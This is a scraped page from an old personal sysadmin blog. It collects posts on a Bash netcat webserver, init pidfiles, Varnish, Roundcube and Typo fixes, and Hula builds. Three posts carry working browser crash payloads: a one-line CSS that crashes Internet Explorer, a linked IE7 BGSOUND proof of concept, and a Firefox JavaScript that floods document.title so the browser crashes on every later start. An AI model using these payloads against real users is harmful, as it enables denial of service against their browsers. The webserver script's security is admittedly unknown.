HOWTO: webserver in 100 lines of Bash
I’m a big Bash fan, I know Perl is the more popular scripting language, and I’m slowly using it more, but hey, if I need something done, I can do it quicker in Bash (keeping in mind that I’m a systems guy, not a dev guy). While at work looking up Bash related syntax I came across a page describing how to run a webserver with 100 lines of Bash. It uses the old school GNU utility Netcat (nc) for communication between the pipes, and just a ton of basic logic and functions to pass it on to the user. It’s one of those things I look at and can’t believe it works, but it does. Of course security is unknown, as is the original author, but I consider this a reference on how to do networking things in Bash; who knows what I’ll use (parts) of it for. If anyone has details on who originally wrote this I’m all ears.[sourcecode language='xml']#!/bin/bash
function debug {
local severity=”$1″
shift
local message=”$@”
echo -n “`date -u`” 1>&2
echo -ne ‘\t’ 1>&2
echo -n “$severity” 1>&2
echo -ne ‘\t’ 1>&2
echo “$message” 1>&2
}
function fix_path {
echo -n “$1″ | head -n 1 | sed ’s|^[/.-]*||’ | sed ’s|/\.*|/|g’
}
function serve_dir {
local dir=”`fix_path “$1″`”
if [ "$dir" = "" ]; then
dir=”./”
fi
echo ‘HTTP/1.1 200 OK’
echo ‘Content-type: text/html;charset=UTF-8′
echo
echo LISTING “$dir”
echo ‘
‘
ls -p “$dir” | sed -e ’s|^\(.*\)$|\1
|’
}
function serve_file {
echo ‘HTTP/1.1 200 OK’
echo ‘Content-type: application/x-download-this’
echo
local file=”`fix_path “$1″`”
debug INFO serving file “$file”
cat “$file”
}
function process {
local url=”`gawk ‘{print $2}’ | head -n 1`”
case “$url” in
*/)
debug INFO Processing “$url” as dir
serve_dir “$url”
break
;;
*)
debug INFO Processing “$url” as file
serve_file “$url”
;;
esac
}
function serve {
local port=”$1″
local sin=”$2″
local sout=”$3″
while debug INFO Running nc; do
nc -l -p “$port” < "$sin" > “$sout” &
pid=”$!”
debug INFO Server PID: “$pid”
trap cleanup SIGINT
head -n 1 “$sout” | process > “$sin”
trap – SIGINT
debug INFO Killing nc
kill “$pid”
done
debug INFO Quiting server
}
function cleanup {
debug INFO Caught signal, quitting…
rm -Rf “$tmp_dir”
exit
}
tmp_dir=”`mktemp -d -t http_server.XXXXXXXXXX`”
sin=”$tmp_dir”/in
sout=”$tmp_dir”/out
pid=0
port=”$1″
mkfifo “$sin”
mkfifo “$sout”
debug INFO Starting server on port “$port”
serve “$port” “$sin” “$sout”
cleanup[/sourcecode]
HOWTO: create a pidfile for a startup script
On the monit mailing list today someone asked how they could monitor a process that didn’t have a pidfile associated with it. Without thinking I jotted this down, there’s likely a better way, but this should work and may be all I need for some init.d scripts for a couple of apps on ramon (the home server). In the the beginning of the startup script, define the PIDFILE with the path and the cmd followed by the pid suffix and then just dump the PID number from the ps output into it:
export PIDFILE=/var/run/${1}.pid
ps -fe | grep ${1} | head -n1 | cut -d" " -f 6 > ${PIDFILE}Once this is done, monit can monitor it just like it monitors any other process with a PID. Later, for a shutdown hook, nuke the PIDFILE on the way out.
if [ -f ${PIDFILE} ]; then
rm ${PIDFILE}
fi
### rest of shutdown ###
exit 0I think that should do it, anyone see a problem with that / a better way?
Allow Varnish to reuse its shared object
BACKGROUND: The following is a proposal I submitted to the Varnish developers in order to make it simpler to integrate Varnish (an HTTP accelerator for web sites) into production environments. fak3r uses Varnish in front of its webserver, Lighttpd, so it’s likely that the page you’re now reading was served to you not by the webserver, but via Varnish.
Currently Varnish requires a C compiler to be present on the machine it’s running on, since it needs to compile the VCL config file into a shared object each time it starts. During shutdown, Varnish removes this shared object since it will be rebuilt during the next start. This routine repeats regardless of if anything has changed in the VCL config file, and serves as a road bump to getting Varnish into certain production environments since traditionally development applications (such as the C compiler) are not allowed in such instances. For now I am putting aside the arguments as to why it’s is acceptable to have development applications in production instances, since that argument’s outcome will vary in different situations, and I am aiming for a solution that will cover all instances.
(more…)
crash Internet Explorer with a link
I thought the days of crashing IE with just some malformed code were over, apparently not. I just takes a misplaced wildcard in a style declaration to send it down.
<style>*{position:relative}<
This took out IE on my work computer which is fully patched. I’ve read that people running IE under Wine in Linux have it crash as well, so it’s certainly app dependant. For those of you playing at home, just click here to try it for yourself. Extra credit if you actually save the file on your windows machine and then try to open it within Windows Explorer! Enjoy.
Firefox 2.0 tweaks
By now you should know that if you surf the web, you should be using Firefox. Earlier this week they released version 2.0 with a host of improvements (many small) and some needed polish. While the jump to 2.0 may have been a bit of a reach, the direction Firefox is heading is always interesting. Of course being an open source project there’s always room for tweaking, and while I now take a much more conservative approach to it, I still think changing some things make it (much) better. After a recent post on Digg I reworked a fresh copy of 2.0 to have minimal tweaks that don’t overwhelm or cause instability. Here I’ll document my basic changes and welcome comments on them, or any others that users prefer. (Continue reading) (more…)
Please Listen Closely, As Our Menu Options Have Changed
From the great Freakonomics.com, an article about an online database that’ll get you through the ‘phone trees’ or mazes anytime you have to call some company for customer service. “One solution to Phone Tree Hell is the beautifully named GetHuman database, which provides a nearly encyclopedic list of companies’ phone numbers and the string of menu choices you must press to bypass the phone tree and get to a human. Example: “SUNOCO … 800‑278‑6626 … Press 0 five times, then mumble when prompted for an account number.” I’ve always hit 00000000000, but perhaps some have caught on to that. This is a nice service, I’ll give it a go next time I need to call up one of these places. And why do all of them spout on about, “Please Listen Closely, As Our Menu Options Have Changed”, sorry, but I’m not buying that.
Roundcube Webmail update script
The Roundcube Webmail Project is moving along, and my Roundcube HOWTO install is one of the more popular ones on my site. Today I updated to the latest SVN version, since they’ve recently moved from CVS to SVN for version control, and wrote a script to automate this so I can just run it nightly via cron. Click on ‘Read more…’ to see the script; you should be able to just cut/paste it, set the perms to 755, edit the variables at the beginning to suit your system and run. Of course you’ll need Subversion installed to checkout the code with this script. Feedback is appreciated if you have any suggestions, or come across something that doesn’t work for you.
#!/bin/sh PATH=${PATH}:/bin:/usr/bin:/usr/local/bin # Edit these variables to suit your system WEBROOT="/usr/local/www/data" RCWM_DIR="roundcubemail-svn" WWW_USER="www" WWW_GRP="www" # test -d "${WEBROOT}/${RCWM_DIR}" if [ $? -eq 0 ]; then else echo "ERROR: ${WEBROOT}/${RCWM_DIR} not found" echo " create it or redefine the variable in the script" exit 1 fi cd /tmp svn checkout https://svn.roundcube.net/trunk mv trunk/roundcubemail/* ${WEBROOT}/${RCWM_DIR} rm -rf trunk chown -R ${WWW_USER}:${WWW_GRP} ${WEBROOT}/${RCWM_DIR}/temp ${WEBROOT}/${RCWM_DIR}/logs/ test -f "${WEBROOT}/${RCWM_DIR}/config/main.inc.php" if [ $? -eq 0 ]; then else echo "WARNING: ${WEBROOT}/${RCWM_DIR}/config/main.inc.php not found" echo " edit the existing main.inc.php.dist and rename sans .dist before running" fi test -f "${WEBROOT}/${RCWM_DIR}/config/db.inc.php" if [ $? -eq 0 ]; then else echo "WARNING: ${WEBROOT}/${RCWM_DIR}/config/db.inc.php not found" echo " edit the existing db.inc.php.dist and rename sans .dist before running" fi exit 0
HOWTO: Fix login issue on Typo
NOTICE: Before you try this, see the update below – this could mess things up if you have more than one user, and you’re not trying to fix the Admin login
fak3r.com runs the latest (greatest?) Typo code, but sometimes this leads to problems. After an update a few days ago I could no longer login to the site, thus I couldn’t add stories, admin the site or anything. The folks on the Typo-dev list had plenty of suggestions on how to fix it, but led me in the right direction when they just said to delete the user and then recreate it with a new password. This worked, and I’m posting it here in case someone else can’t login to their Typo instance in the future. Go into your database (mine is mySQL 4.x), switch to your Typo database and enter the following:
delete from users where id=1;Quit out, fire up your Typo site in a browser and create a new user – done.
UPDATE: Dave from the typo-dev mailing list thinks this isn’t a good idea – his comments:
Think that’s a bad fix – if you have an auto-increment id field on the
users
table, then when you recreate the user he has a different id.
I expect that’s why you can’t edit any of your old posts.The best fix is to use the console, find the old user
me = User.find(1)
in my case, then reset the password with a
me.password = me.password_confirmation = ‘sekrit’
me.save
Later Steven wrote in to talk more about how to get into console:
It’s not a Ruby thing, it’s a Rails thing. >You’ll have seen it if you watched any of the >screencasts by DHH. In case you haven’t seen
any of them, go here:http://rubyonrails.com/screencasts
this one in particular (or its earlier >incarnation) is the one that
lit a fire under most folks asses to check >out rails:http://media.rubyonrails.org/video/railstake2with_sound.mov
In a nutshell though, from the root of your application, run:
script/consoleThis will bring up an interactive shell
session with your
applications data and environment available.
Lastly, here’s the Console manual for Ruby
IE 7 Beta 2 (and matching DoS attack) released
Amazing, so today Microsoft releases Beta 2 of IE 7, and almost simultaneously comes a tailor made DoS attack! ”Overview: A denial of service vulnerability exists within Microsoft Internet Explorer 7.0 Beta 2 which allows for an attacker to cause the browser to crash, and or to execute arbitrary code on the targeted host. Technical Details: When running a specially crafted .html file, urlmon.dll inproperly parsers the ‘BGSOUND xsrc=file://—’ (approx. 344 dashes) and causes the crash. … Vendor Status: Microsoft was notified. Workaround: Mozilla Firefox.” If you are running IE 7 Beta 2 and want to give it a go, go to that link and construct the code, or simply click here for the proof of concept. I like how this comes up just after the zero day WMF flaw, and how it nicely dovetails into their “Trustworthy Computing” effort (emphasis on effort). ”Trustworthy Computing is a long-term, collaborative effort to provide more secure, private, and reliable computing experiences for everyone. This is a core company tenet at Microsoft and guides virtually everything we do. Trustworthy Computing is built on four pillars: Security, Privacy, and Reliability in our software, services, and products; and integrity in our Business Practices.” Sure, sounds like a game plan.
Firefox buffer overflow
There’s a Firefox buffer overflow script listed on Packet Storm. The Javascript can be embedded into HTML and make Firefox log a very long topic line into its history.dat file. Any ensuing Firefox starts will cause a crash due to a buffer overflow. The fix would be to delete the history.dat file, which would be recreated automatically during the next start, but that’s not something most users would know. I’m sure this will be patched quickly, but this has to be the first type of bug I’ve seen targeting Firefox.
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}Hula progress on FreeBSD
I’ve been pretty quiet about Hula since I’ve been unable to successfully build *and* run it since r370 (currently Hula is at r609). While I’ve solved and committed all the autogen build issues on FreeBSD, it still won’t run; the controlling hulamanager process just hangs, with no errors or output to help out. On the mailing list this behavior is reportedly due to the (hardlinked) renaming of ’server messaging server’ to ‘hula messaging’ server, which bombs if you use the filesystem based mdb. Alex sent me this patch:
diff -urNad --exclude=CVS --exclude=.svn ./src/libs/mdb-file/mdbfile.c
/tmp/dpep-work.Qpsn4d/hula-0.1.0+svn472/src/libs/mdb-file/mdbfile.c
--- ./src/libs/mdb-file/mdbfile.c 2005-09-16 12:19:45.000000000 +0100
+++ /tmp/dpep-work.Qpsn4d/hula-0.1.0+svn472/src/libs/mdb-file/mdbfile.c 2005-09-20 20:45:41.000000000 +0100
@@ -3207,8 +3207,8 @@
MDBFile.unload = FALSE;
strcpy(MDBFile.localTree, "\Tree");
- strcpy(MDBFile.serverDN, "\Tree\Context\Hula");
- strcpy(MDBFile.replicaDN, "Hula");
+ strcpy(MDBFile.serverDN, "\Tree\Context\Server");
+ strcpy(MDBFile.replicaDN, "Server");
strcpy(MDBFile.base64Chars, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=");
#if defined(LINUX)and it applies cleanly, but yet the same issue occurs. I have a bug written on this, and will try to get back on IRC tomorrow and work on it. Also, due to a request on the hula-dev list, I have added some logic to my gethula script; version 1.7 should now support NetBSD, but I’m waiting for feedback on that. Again, it *should* compile, but I don’t expect it to run…yet.
Zimbra build script released
Here’s my first swing at a hacked together build script to download, build, compile and install the Zimbra Collaboration Suite. If you haven’t been hip to it, Zimbra just kinda appeared out of nowhere, with a pretty nice email/cal webapp that has all the AJAX goodness you could hope for, with true drag and drop, pop up balloons, live searching and more. They have a demo you can play with here, and it’s worth checking out, just to see what’s up. For now my focus for day to day is still on the Hula Project, but to play with Zimbra I needed to hack a script together just so I could get this built on a ‘normal’ Linux distro (in this case my old server, jorge running Gentoo), and not Red Hat Enterprise and Fedora as they had released. I’ve already sent the script to a Zimbra dev, as well as a Ubuntu hacker for testing, so we’ll go from there. First impressions are that it’s a really nice, all in one email/cal server/app presentation. Unlike Hula controling everything, Zimbra is more of a LAMP application, so it will be interesting to see where they place this in terms of how well it could scale in an enterprise environment.
Deprecated proc and C debugging
While trying to debug Hula on FreeBSD I found that the normal GNU C debugging tools (gdb, truss, ktrace) fail since /proc is no longer on the filesystem, in FreeBSD 6.0, for them to write to. It was deprecated as a security concern and functionality moved to sysctl for 5.x, but for 6.x it’s just gone. I’m looking for a long term solution, but short term was just to recreate /proc on the server and mount it. One liner coming up:
echo "proc /proc procfs rw 0 0" >> /etc/fstab; mount /procince Linux still uses /proc I assume the functionality of sysctl would cover these tools to debug C code somehow and redirect stdin, but I don’t know how. Any FreeBSD C hackers out there with a hint?
Hi, I'm fak3r and I've been online for over 15 years, blogging for 10. I work with open source software, various hardware and whatever else that I can hack on. I enjoy learning by doing, painting infrequently and listening to more music than the law allows. Feel free to follow me and comment on my thoughts and ideas; we're all in it together kid.
